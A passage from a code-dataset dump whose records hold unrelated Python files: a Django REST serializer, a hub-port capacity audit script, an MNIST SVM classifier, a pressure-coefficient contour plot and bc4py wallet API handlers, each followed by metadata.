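alphabet_index = [{s: r for r, s in enumerate(a)} for a in alphabet]
sizes = [len(a) for a in alphabet]
L = len(alphabet) - 1

def code(outcome):
    """Mixed-radix rank of an outcome, as in the 'analytic' branch."""
    return sum(alphabet_index[i][s] * sizes[i] ** (L - i)
               for i, s in enumerate(outcome))

outcomes = [('b', 'x'), ('a', 'y'), ('b', 'y'), ('a', 'x')]
print(sorted(outcomes, key=code))
# [('a', 'x'), ('a', 'y'), ('b', 'x'), ('b', 'y')], i.e. itertools.product order
print(list(itertools.product(*alphabet)))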
"exceptions.InvalidDistribution", "line_number": 295, "usage_type": "call"}, {"api_name": "exceptions.InvalidOutcome", "line_number": 307, "usage_type": "call"}, {"api_name": "exceptions.InvalidOutcome", "line_number": 309, "usage_type": "call"}, {"api_name": "six.moves.map", "line_number": 319, "usage_type": "call"}, {"api_name": "six.moves.zip", "line_number": 320, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 320, "usage_type": "call"}, {"api_name": "six.moves.zip", "line_number": 321, "usage_type": "call"}, {"api_name": "six.moves.zip", "line_number": 332, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 332, "usage_type": "call"}, {"api_name": "six.moves.zip", "line_number": 334, "usage_type": "call"}, {"api_name": "six.moves.zip", "line_number": 340, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 340, "usage_type": "call"}]} +{"seq_id": "233091487", "text": "from django.forms import widgets\nfrom rest_framework import serializers\nfrom snippets.models import Snippet, LANGUAGE_CHOICES, STYLE_CHOICES\nfrom django.contrib.auth.models import User\n\n#하이퍼링크로 API를 연결하기 위해서는 ModelSerializer >> HyperlinkedModelSerializer로 변경해야한다.\nclass SnippetSerializer(serializers.HyperlinkedModelSerializer):\n #직렬화에 ReadOnlyField가 사용될 때 언제나 읽기 전용이므로, 모델의 인스턴스를 업데이트할 때는 사용할 수 없다.\n owner = serializers.ReadOnlyField(source='owner.username') #== CharField(read_only=True)\n highlight = serializers.HyperlinkedIdentityField(view_name = 'snippet-highlight', format='html')\n class Meta:\n model = Snippet #Serializer class의 단축버전\n field = ('url','highlight','owner','title','code','linenos','language','style')\n\n def create(self, validated_data): \n \"\"\"\n 검증한 요청 데이터에 더하여 'owner'필드도 전달한다.\n \"\"\"\n return Snippet.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n \"\"\"\n 검증한 데이터로 기존 `Snippet` 인스턴스를 업데이트한 후 리턴합니다.\n \"\"\"\n instance.title = validated_data.get('title', instance.title)\n instance.code = validated_data.get('code', instance.code)\n instance.linenos = validated_data.get('linenos', instance.linenos)\n instance.language = validated_data.get('language', instance.language)\n instance.style = validated_data.get('style', instance.style)\n instance.save()\n return instance\n\n#사용자를 보여주는 API\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n \"\"\"\n snippets은 사용자 모델과 반대방향으로 이루어져있어서\n ModelSerializer에 기본적으로 추가되지 않는다.\n 따라서 명시적으로 필드를 지정해준다.\n \"\"\"\n snippets = serializers.HyperlinkedRelatedField(many=True, view_name = 'snippet-detail',read_only=True)\n\n class Meta:\n model = User\n fields = ('url','username','snippets')", "sub_path": "snippets/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 2159, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "rest_framework.serializers.HyperlinkedModelSerializer", "line_number": 7, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 7, "usage_type": "name"}, {"api_name": "rest_framework.serializers.ReadOnlyField", "line_number": 9, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 9, "usage_type": "name"}, {"api_name": "rest_framework.serializers.HyperlinkedIdentityField", "line_number": 10, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 10, "usage_type": "name"}, {"api_name": "snippets.models.Snippet", "line_number": 12, "usage_type": "name"}, 
{"api_name": "snippets.models.Snippet.objects.create", "line_number": 19, "usage_type": "call"}, {"api_name": "snippets.models.Snippet.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "snippets.models.Snippet", "line_number": 19, "usage_type": "name"}, {"api_name": "rest_framework.serializers.HyperlinkedModelSerializer", "line_number": 34, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 34, "usage_type": "name"}, {"api_name": "snippets.models", "line_number": 40, "usage_type": "name"}, {"api_name": "rest_framework.serializers.HyperlinkedRelatedField", "line_number": 40, "usage_type": "call"}, {"api_name": "rest_framework.serializers", "line_number": 40, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User", "line_number": 43, "usage_type": "name"}]} +{"seq_id": "473159778", "text": "#!/usr/bin/env python\n#===============================================================================\n# AuditPortCapacity\n#\n# Description:\n# Script to open a file (ending in *pyINV.txt), and per the particular hub site,\n# compare the data-rates supported by the optic/card versus the data-rate\n# provided in the circuit description\n#\n# Print and FileWrite flags defaults can be changed in the main method\n#\n# Version:\n# MM.mm DD/MM/YY\n# 00.00 31/07/19 First version\n# 00.01 23/01/20 Collapse common write/print for unit tests into script\n#\n# Example/Usage:\n# Input file from directory: 'NWNWVACROS0-MC100BCRpyInv.json'\n# Output file name: 'NWNWVACROS0-MC100BCRpyInvAudit.json'\n#\n#===============================================================================\nimport json\nimport re\n\nfrom parsers.CreateDictInventory import setINVDictFields, setINVDictCircuitFields\nfrom src.CreateListofSites import createSiteMenuState, buildTIDListFromJSON, createStateMenu\nfrom src.GetHubCircuits import compilePortCircuits\nfrom src.GetProductMatch import getMatchDataRateItem\nfrom src.OpenFileInvMgr import openProcessedFile\nfrom src.ScriptInventory import getVendorSelect, loadJSONFile, getServerSelect\nfrom src.SetMetroNameInv import filterTIDbyState\nfrom src.WriteFileInvMgr import writeLogMessage, writePyOutputFile, writePyJSONFile\n\n\n[KEYSHSLPT, KEYTID, KEYSTATE, KEYPRODUCTID, KEYPARTNUM, KEYVERSION,\n KEYEQUIPNAME, KEYSERIALNUM, KEYCLEI, KEYLOCATION, KEYOPSTATE,\n KEYMFGDATE, KEYSITESSP, KEYSHELF, KEYSLOT, KEYPORT] = setINVDictFields()\n\n[KEYCIRCUIT, KEYCIRCUITTYPE, KEYFACILITY, KEYSTATEPRIM, KEYALARM,\n KEYPROVISION, KEYSERVICEABLE, KEYDISCOVERY, KEYSIDEA, KEYSIDEZ] = setINVDictCircuitFields()\n\ndirINV = 'C:/Users/beclarke/OneDrive - Cox Communications/Documents/Projects/HubInventory'\n\nKEYCLIENT = 'Client'\nKEYTRUNK = 'Trunk'\nmasterKey = 'Cisco_Metros'\nKEYRATEPRODUCTID = 'Rate(ProdID)'\nKEYRATECIRCUIT = 'Rate(Circuit)'\nKEYVALIDITY = 'Validity'\n\n\ndef multiRatePorts():\n dictMultiRate = {'BUILTIN': ['100G', '200G'],\n 'NCS2K-200G-CK-LIC': ['100G', '200G'],\n 'ONS-CFP2-WDM': ['100G', '200G'],\n 'ONS-SE-Z1': ['1G', '2.5G']\n }\n return dictMultiRate\n\n\ndef initPortAudit():\n dictCapacityAudit = {KEYSHSLPT: 'x',\n KEYPRODUCTID: 'x',\n KEYRATEPRODUCTID: 'x',\n KEYCIRCUITTYPE: 'x',\n KEYRATECIRCUIT: 'x',\n KEYVALIDITY: 'x',\n KEYCIRCUIT: 'x'}\n return dictCapacityAudit\n\n\ndef populateCapacityAudit(v, rateProdID, rateCircuit, validity):\n dictPortAudit = initPortAudit()\n dictPortAudit[KEYSHSLPT] = v[KEYSHSLPT]\n dictPortAudit[KEYPRODUCTID] = v[KEYPRODUCTID]\n dictPortAudit[KEYRATEPRODUCTID] = rateProdID\n 
dictPortAudit[KEYCIRCUIT] = v[KEYCIRCUIT]\n dictPortAudit[KEYCIRCUITTYPE] = v[KEYCIRCUITTYPE]\n dictPortAudit[KEYRATECIRCUIT] = rateCircuit\n dictPortAudit[KEYVALIDITY] = validity\n return dictPortAudit\n\n\ndef checkCapacity(dictPortCircuits, selectSite):\n dictCapacityCheck = {selectSite: {}}\n dictMultiRate = multiRatePorts()\n for k,v in dictPortCircuits[selectSite].items():\n ProductID = v[KEYPRODUCTID]\n Circuit = v[KEYCIRCUIT]\n rateProdID = getMatchDataRateItem(ProductID)\n rateCircuit = getMatchDataRateItem(Circuit)\n if Circuit not in ['No Circuit', 'NO HW'] and ProductID != 'fiber-port':\n if ProductID in dictMultiRate.keys():\n rateProdID = dictMultiRate[ProductID]\n if rateCircuit not in rateProdID:\n dictPortAudit = populateCapacityAudit(v, rateProdID, rateCircuit, 'error')\n dictCapacityCheck[selectSite][k] = dictPortAudit\n elif rateProdID != rateCircuit:\n dictPortAudit = populateCapacityAudit(v, rateProdID, rateCircuit, 'error')\n dictCapacityCheck[selectSite][k] = dictPortAudit\n return dictCapacityCheck\n\n\ndef convertCapCheckToList(dictCheckCap, selectSite):\n caps = [list(v.values()) for k, v in dictCheckCap[selectSite].items()]\n [item.insert(0, selectSite) for item in caps]\n header = [list(v.keys()) for k, v in dictCheckCap[selectSite].items()][0]\n header.insert(0, 'TID')\n listCheckCap = []\n listCheckCap.append(header)\n listCheckCap.extend(caps)\n return listCheckCap\n\n\ndef compileCapacityCheck(jsonTID, selectSite, selectVendor):\n dictPortCircuits = compilePortCircuits(jsonTID, selectSite, selectVendor)\n dictAllCap = checkCapacity(dictPortCircuits, selectSite)\n try:\n listCheckCap = convertCapCheckToList(dictAllCap, selectSite)\n except IndexError:\n dictAllCap[selectSite]['None'] = initPortAudit()\n listCheckCap = convertCapCheckToList(dictAllCap, selectSite)\n return dictAllCap, listCheckCap\n\n\ndef printCapCheckListToConsole(listCheckCap):\n formatString = '{:24} {:8} {:20} {:12} {:14} {:13} {:8} {:80} '\n for item in listCheckCap:\n print(formatString.format(*item))\n print('\\n')\n\n\ndef auditCapacityServerUnit(writeToFileFlag=False, printFlag=True):\n # call sub to read in file\n fileName, fileINV, dirINV = openProcessedFile(fileXt='*pyInv.json')\n if fileName == '': return\n writeLogMessage('Auditing capacity for sites in ' + fileName, dirINV)\n\n jsonSrc = loadJSONFile(fileINV)\n selectVendor = getVendorSelect(fileINV)\n selectServer = getServerSelect(fileINV)\n dictAllCap = {selectServer: {}}\n listAllCap = []\n\n # Get site list to accurately count totals per site\n listSiteTID = buildTIDListFromJSON(fileINV)\n for selectSite in listSiteTID:\n writeLogMessage('Auditing port capacity for ' + selectSite, dirINV)\n # run for each distinct site in the file\n jsonTID = jsonSrc[selectSite]\n dictCheckCap, listCheckCap = compileCapacityCheck(jsonTID, selectSite, selectVendor)\n if 'None' not in dictCheckCap[selectSite].keys():\n dictAllCap[selectServer].update(dictCheckCap)\n listAllCap.extend(listCheckCap[1:])\n\n listAllCap.insert(0, listCheckCap[0])\n fileXts = ['pyInvAuditAll.txt', 'pyInvAuditAll.json']\n auditCapacityEnd(dictAllCap, listAllCap, fileName, selectSite,\n fileXts, writeToFileFlag, printFlag)\n\n\ndef auditCapacityStateUnit(writeToFileFlag=False, printFlag=True):\n # call sub to read in file\n fileName, fileINV, dirINV = openProcessedFile(fileXt='*pyInv.json')\n if fileName == '': return\n selectState = createStateMenu()\n if selectState is None: return\n writeLogMessage('Auditing capacity for sites in ' + fileName, dirINV)\n\n 
jsonSrc = loadJSONFile(fileINV)\n selectVendor = getVendorSelect(fileINV)\n selectServer = getServerSelect(fileINV)\n dictAllCap = {selectServer: {}}\n listAllCap = []\n\n # Get site list to accurately count totals per site\n listSiteTID = buildTIDListFromJSON(fileINV)\n listStateTID = filterTIDbyState(listSiteTID, selectState)\n for selectSite in listStateTID:\n writeLogMessage('Auditing port capacity for ' + selectSite, dirINV)\n # run for each distinct site in the file\n jsonTID = jsonSrc[selectSite]\n dictCheckCap, listCheckCap = compileCapacityCheck(jsonTID, selectSite, selectVendor)\n if 'None' not in dictCheckCap[selectSite].keys():\n dictAllCap[selectServer].update(dictCheckCap)\n listAllCap.extend(listCheckCap[1:])\n\n listAllCap.insert(0, listCheckCap[0])\n fileXts = ['pyInvAudit' + selectState + '.txt',\n 'pyInvAudit' + selectState + '.json']\n auditCapacityEnd(dictAllCap, listAllCap, fileName, selectSite,\n fileXts, writeToFileFlag, printFlag)\n\n\ndef auditCapacityUnit(writeToFileFlag=False, printFlag=True):\n # call sub to read in file\n fileName, fileINV, dirINV = openProcessedFile(fileXt='*pyInv.json')\n if fileName == '': return\n selectSite = createSiteMenuState(fileINV, dirINV)\n if selectSite is None: return\n\n jsonSrc = loadJSONFile(fileINV)\n jsonTID = jsonSrc[selectSite]\n selectVendor = getVendorSelect(fileINV)\n writeLogMessage('Auditing Port Circuits for ' + selectSite, dirINV)\n\n dictCheckCap, listCheckCap = compileCapacityCheck(jsonTID, selectSite, selectVendor)\n fileXts = ['pyInvAudit.txt', 'pyInvAudit.json']\n auditCapacityEnd(dictCheckCap, listCheckCap, fileName, selectSite,\n fileXts, writeToFileFlag, printFlag)\n\n\ndef auditCapacityEnd(dictCap, listCap, fileName, selectSite,\n fileXts, writeToFileFlag=False, printFlag=True):\n if printFlag:\n print(json.dumps(dictCap, indent=4))\n # printCapCheckListToConsole(listCheckCap)\n\n fileName = fileName + '_' + selectSite\n if writeToFileFlag:\n writePyOutputFile(dirINV, fileName, listCap, fileXts[0])\n writePyJSONFile(dirINV, fileName, dictCap, fileXts[1])\n else:\n writeQuery = input('Do you wish to save the Audit file (Y/N)?:')\n if re.search('y', writeQuery) or re.search('Y', writeQuery):\n writePyOutputFile(dirINV, fileName, listCap, fileXts[0])\n writePyJSONFile(dirINV, fileName, dictCap, fileXts[1])\n\n writeLogMessage('Script complete.', dirINV)\n\n\ndef main(writeToFileFlag=False, printFlag=True):\n # auditCapacityUnit(writeToFileFlag, printFlag)\n # auditCapacityServerUnit(writeToFileFlag, printFlag)\n auditCapacityStateUnit(writeToFileFlag, printFlag)\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "src/AuditPortCapacity.py", "file_name": "AuditPortCapacity.py", "file_ext": "py", "file_size_in_byte": 9577, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "parsers.CreateDictInventory.setINVDictFields", "line_number": 37, "usage_type": "call"}, {"api_name": "parsers.CreateDictInventory.setINVDictCircuitFields", "line_number": 40, "usage_type": "call"}, {"api_name": "src.GetProductMatch.getMatchDataRateItem", "line_number": 90, "usage_type": "call"}, {"api_name": "src.GetProductMatch.getMatchDataRateItem", "line_number": 91, "usage_type": "call"}, {"api_name": "src.GetHubCircuits.compilePortCircuits", "line_number": 116, "usage_type": "call"}, {"api_name": "src.OpenFileInvMgr.openProcessedFile", "line_number": 135, "usage_type": "call"}, {"api_name": "src.WriteFileInvMgr.writeLogMessage", "line_number": 137, 
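checkCapacity in the AuditPortCapacity record flags a port when the data rate parsed from the circuit description is not among the rates the installed optic supports, with multiRatePorts() overriding single-rate product IDs. The decision rule reduces to a set-membership test; a self-contained sketch (the rows below are hypothetical, and only the multi-rate entries are quoted from the table above):

# Multi-rate optics, quoted from multiRatePorts() above.
MULTI_RATE = {
    'NCS2K-200G-CK-LIC': ['100G', '200G'],
    'ONS-SE-Z1': ['1G', '2.5G'],
}

def port_rate_ok(product_id, rate_prod_id, rate_circuit):
    """True when the circuit's rate is one the installed optic can carry."""
    supported = MULTI_RATE.get(product_id, [rate_prod_id])
    return rate_circuit in supported

# Hypothetical rows: (product id, rate parsed from product id, rate from circuit).
rows = [
    ('ONS-SE-Z1', '1G', '2.5G'),   # ok: multi-rate optic also carries 2.5G
    ('XFP-10G', '10G', '10G'),     # ok: rates agree
    ('XFP-10G', '10G', '100G'),    # error: 100G circuit on a 10G optic
]
for row in rows:
    print(row, 'ok' if port_rate_ok(*row) else 'error')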
"usage_type": "call"}, {"api_name": "src.ScriptInventory.loadJSONFile", "line_number": 139, "usage_type": "call"}, {"api_name": "src.ScriptInventory.getVendorSelect", "line_number": 140, "usage_type": "call"}, {"api_name": "src.ScriptInventory.getServerSelect", "line_number": 141, "usage_type": "call"}, {"api_name": "src.CreateListofSites.buildTIDListFromJSON", "line_number": 146, "usage_type": "call"}, {"api_name": "src.WriteFileInvMgr.writeLogMessage", "line_number": 148, "usage_type": "call"}, {"api_name": "src.OpenFileInvMgr.openProcessedFile", "line_number": 164, "usage_type": "call"}, {"api_name": "src.CreateListofSites.createStateMenu", "line_number": 166, "usage_type": "call"}, {"api_name": "src.WriteFileInvMgr.writeLogMessage", "line_number": 168, "usage_type": "call"}, {"api_name": "src.ScriptInventory.loadJSONFile", "line_number": 170, "usage_type": "call"}, {"api_name": "src.ScriptInventory.getVendorSelect", "line_number": 171, "usage_type": "call"}, {"api_name": "src.ScriptInventory.getServerSelect", "line_number": 172, "usage_type": "call"}, {"api_name": "src.CreateListofSites.buildTIDListFromJSON", "line_number": 177, "usage_type": "call"}, {"api_name": "src.SetMetroNameInv.filterTIDbyState", "line_number": 178, "usage_type": "call"}, {"api_name": "src.WriteFileInvMgr.writeLogMessage", "line_number": 180, "usage_type": "call"}, {"api_name": "src.OpenFileInvMgr.openProcessedFile", "line_number": 197, "usage_type": "call"}, {"api_name": "src.CreateListofSites.createSiteMenuState", "line_number": 199, "usage_type": "call"}, {"api_name": "src.ScriptInventory.loadJSONFile", "line_number": 202, "usage_type": "call"}, {"api_name": "src.ScriptInventory.getVendorSelect", "line_number": 204, "usage_type": "call"}, {"api_name": "src.WriteFileInvMgr.writeLogMessage", "line_number": 205, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 216, "usage_type": "call"}, {"api_name": "src.WriteFileInvMgr.writePyOutputFile", "line_number": 221, "usage_type": "call"}, {"api_name": "src.WriteFileInvMgr.writePyJSONFile", "line_number": 222, "usage_type": "call"}, {"api_name": "re.search", "line_number": 225, "usage_type": "call"}, {"api_name": "src.WriteFileInvMgr.writePyOutputFile", "line_number": 226, "usage_type": "call"}, {"api_name": "src.WriteFileInvMgr.writePyJSONFile", "line_number": 227, "usage_type": "call"}, {"api_name": "src.WriteFileInvMgr.writeLogMessage", "line_number": 229, "usage_type": "call"}]} +{"seq_id": "535830332", "text": "from django.conf.urls import url\nfrom . 
import views\n\nurlpatterns = [\n\turl(r'^$', views.index),\n\turl(r'^main$', views.index),\n\turl(r'^register$', views.register),\n\turl(r'^login$', views.login),\n\turl(r'^travels$', views.travels),\n\turl(r'^logout$', views.logout),\n\turl(r'^add_trip$', views.add_trip), # displays new trip page\n\turl(r'^new_trip$', views.new_trip), # processes new trip\n\t#url(r'^show_trip$', views.show_trip),\n\turl(r'^show_trip/(?P<id>\\d+)$', views.show_trip),\n\turl(r'^join/(?P<id>\\d+)$', views.join),\n\t#url(r'^travels/destination/$', views.show),\n\t#url(r'^travels/add$', views.add),\n]", "sub_path": "apps/travel/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 605, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "django.conf.urls.url", "line_number": 5, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "148400151", "text": "\nimport pandas as pd\nimport numpy as np\ntrain=pd.read_csv('data/train.csv')\nX_train=train.iloc[:,1:]\nX_train[X_train>0]=1\nY_train=train.iloc[:,0]\nfrom sklearn.feature_selection import VarianceThreshold\n#X_train.std(axis=0)\nsel = VarianceThreshold(threshold=(1e-2))\nsel.fit(X_train)\nX_train=sel.transform(X_train)\nX_test=pd.read_csv('data/test.csv')\nX_test[X_test>0]=1\nX_test=sel.transform(X_test)\n\n\nfrom sklearn import decomposition\n#pca = decomposition.PCA()\n#pca.fit(X_train)\n#pca.explained_variance_[pca.explained_variance_>1].size\n#from matplotlib import pyplot as plt\n#plt.plot(np.arange(0,X_train.shape[1],1),np.cumsum(pca.explained_variance_)/np.sum(pca.explained_variance_))\n#plt.hlines(xmax=X_train.shape[1],xmin=0,y=0.9)\n#pca = decomposition.PCA(n_components=75)\n#pca.fit(X_train)\n#X_train_pca=pca.transform(X_train)\n#X_test_pca=pca.transform(X_test)\n\nfrom sklearn import svm\nfrom sklearn.model_selection import GridSearchCV\nsvc = svm.SVC(kernel='linear')\ngsvc=GridSearchCV(estimator=svc, param_grid=dict(C=np.array([0.01,0.05,0.1,0.2,0.5,1])),n_jobs=-1)\n#gsvc.fit(X_train_pca,Y_train)\ngsvc.fit(X_train,Y_train)\n\n#Label=gsvc.predict(X_test_pca)\nLabel=gsvc.predict(X_test)\nprediction=pd.DataFrame({'ImageId':np.arange(1,X_test.shape[0]+1,1),'Label':Label})\nprediction.to_csv('data/submision.csv')\n\n\n\n\n", "sub_path": "kaggle_MNIST/pca_svm.py", "file_name": "pca_svm.py", "file_ext": "py", "file_size_in_byte": 1310, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "pandas.read_csv", "line_number": 4, "usage_type": "call"}, {"api_name": "sklearn.feature_selection.VarianceThreshold", "line_number": 10, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 13, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.svm", 
"line_number": 32, "usage_type": "name"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 33, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "158113343", "text": "import matplotlib.pyplot as plt\n#from matplotlib.mlab import griddata\nfrom scipy.interpolate import griddata\nimport numpy as np\nfrom pylab import savefig\n\nplt.rc('font',family='serif')\n#plt.rc('font',**{'family':'serif','serif':['Palatino']})\n#plt.rc('text', usetex=True)\n\nfig = plt.figure()\nax = fig.add_subplot(111)\n\nf = open('outputdata/dp_coeff.txt', 'r')\n\nx_list = []\ny_list = []\nz_list = []\nx_list_neg = []\ny_list_rev = []\n\ndata = f.readline()\nheading = f.readline()\n\nfor l in f:\n lstr = l.split()\n x_list.append(float(lstr[1]))\n x_list_neg.append(-float(lstr[1]))\n y_list.append(float(lstr[0]))\n z_list.append(float(lstr[2]))\n \ny_max = max(y_list)\n\nfor i in range(len(y_list)):\n y_list_rev.append(y_max-y_list[i])\n \n# pressure coefficient contour graph for right side of wing \nxc = np.linspace(min(x_list), max(x_list), num=500)\nyc = np.linspace(min(y_list_rev), max(y_list_rev), num = 500)\nx_grid, y_grid = np.meshgrid(xc,yc)\n# zip gives paired value\nzc = griddata(zip(x_list, y_list_rev), z_list, (x_grid, y_grid), method='cubic')\ncp = ax.contourf(xc, yc, zc)\n\n# for left side of wing\nxcL = np.linspace(min(x_list_neg), max(x_list_neg), num=500)\nx_grid_neg, y_grid = np.meshgrid(xcL, yc)\nzcL = griddata(zip(x_list_neg, y_list_rev), z_list, (x_grid_neg, y_grid), method='cubic')\nax.contourf(xcL, yc, zcL)\n\nplt.colorbar(cp)\nplt.title(\"Pressure Coefficient at Different Regions of the Wing\")\nplt.text(min(x_list_neg)*0.95,max(y_list)*0.85,data,fontsize=10)\nplt.xlabel('Spanwise Length')\nplt.ylabel('Chordwise Length')\n\nsavefig('figures/dp_coeff.png')\n\nplt.show()\n\nf.close()\n", "sub_path": "v0.0_vlm/dp_coeff.py", "file_name": "dp_coeff.py", "file_ext": "py", "file_size_in_byte": 1607, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "matplotlib.pyplot.rc", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 40, "usage_type": "call"}, {"api_name": "scipy.interpolate.griddata", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 47, "usage_type": "call"}, {"api_name": "scipy.interpolate.griddata", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, 
"usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "pylab.savefig", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}]} +{"seq_id": "174837651", "text": "from bc4py.config import C, V, BlockChainError\nfrom bc4py.bip32 import convert_address, addr2bin\nfrom bc4py.user import Balance\nfrom bc4py.user.api import utils\nfrom bc4py.database.builder import chain_builder, user_account\nfrom bc4py.database.create import create_db\nfrom bc4py.database.account import *\nfrom bc4py.database.tools import get_unspents_iter, get_my_unspents_iter\nfrom aiohttp import web\n\n\nasync def list_balance(request):\n confirm = int(request.query.get('confirm', 6))\n data = dict()\n with create_db(V.DB_ACCOUNT_PATH) as db:\n cur = db.cursor()\n users = user_account.get_balance(confirm=confirm, outer_cur=cur)\n for user, balance in users.items():\n data[read_userid2name(user, cur)] = dict(balance)\n return utils.json_res(data)\n\n\nasync def list_transactions(request):\n page = int(request.query.get('page', 0))\n limit = int(request.query.get('limit', 25))\n data = list()\n f_next_page = False\n start = page * limit\n for tx_dict in user_account.get_movement_iter(start=page, f_dict=True):\n if limit == 0:\n f_next_page = True\n break\n tx_dict['index'] = start\n data.append(tx_dict)\n start += 1\n limit -= 1\n return utils.json_res({'txs': data, 'next': f_next_page})\n\n\nasync def list_unspents(request):\n if not chain_builder.db.db_config['addrindex']:\n return utils.error_res('address isn\\'t full indexed')\n try:\n best_height = chain_builder.best_block.height\n page = int(request.query.get('page', 0))\n limit = min(100, int(request.query.get('limit', 25)))\n start = page * limit\n finish = (page+1) * limit - 1\n f_next_page = False\n target_address = request.query['address']\n unspents_iter = get_unspents_iter(target_address=set(target_address.split(',')))\n data = list()\n for index, (address, height, txhash, txindex, coin_id, amount) in enumerate(unspents_iter):\n if finish < index:\n f_next_page = True\n break\n if index < start:\n continue\n data.append({\n 'address': address,\n 'height': height,\n 'confirmed': None if height is None else best_height - height,\n 'txhash': txhash.hex(),\n 'txindex': txindex,\n 'coin_id': coin_id,\n 'amount': amount\n })\n return utils.json_res({'data': data, 'next': f_next_page})\n except Exception:\n return utils.error_res()\n\n\nasync def list_private_unspents(request):\n data = list()\n best_height = chain_builder.best_block.height\n with create_db(V.DB_ACCOUNT_PATH) as db:\n cur = db.cursor()\n for address, height, txhash, txindex, coin_id, amount in get_my_unspents_iter(cur):\n data.append({\n 'address': address,\n 'height': height,\n 'confirmed': None if height is None else best_height - height,\n 'txhash': txhash.hex(),\n 'txindex': txindex,\n 'coin_id': coin_id,\n 'amount': amount\n })\n return utils.json_res(data)\n\n\nasync def list_account_address(request):\n with create_db(V.DB_ACCOUNT_PATH) as db:\n cur = db.cursor()\n user_name = request.query.get('account', C.account2name[C.ANT_UNKNOWN])\n user_id = 
read_name2userid(user_name, cur)\n address_list = list()\n for uuid, address, user in read_pooled_address_iter(cur):\n if user_id == user:\n if user == C.ANT_VALIDATOR:\n address_list.append(convert_address(ck=address, hrp=V.BECH32_HRP, ver=C.ADDR_VALIDATOR_VER))\n elif user == C.ANT_CONTRACT:\n address_list.append(convert_address(ck=address, hrp=V.BECH32_HRP, ver=C.ADDR_CONTRACT_VER))\n else:\n address_list.append(address)\n return utils.json_res({'account': user_name, 'user_id': user_id, 'address': address_list})\n\n\nasync def move_one(request):\n try:\n post = await utils.content_type_json_check(request)\n ant_from = post.get('from', C.account2name[C.ANT_UNKNOWN])\n ant_to = post['to']\n coin_id = int(post.get('coin_id', 0))\n amount = int(post['amount'])\n coins = Balance(coin_id, amount)\n with create_db(V.DB_ACCOUNT_PATH, f_strict=True) as db:\n cur = db.cursor()\n _from = read_name2userid(ant_from, cur)\n _to = read_name2userid(ant_to, cur)\n txhash = user_account.move_balance(_from, _to, coins, cur)\n db.commit()\n return utils.json_res({'txhash': txhash.hex(), 'from_id': _from, 'to_id': _to})\n except Exception:\n return utils.error_res()\n\n\nasync def move_many(request):\n try:\n post = await utils.content_type_json_check(request)\n ant_from = post.get('from', C.account2name[C.ANT_UNKNOWN])\n ant_to = post['to']\n coins = Balance()\n 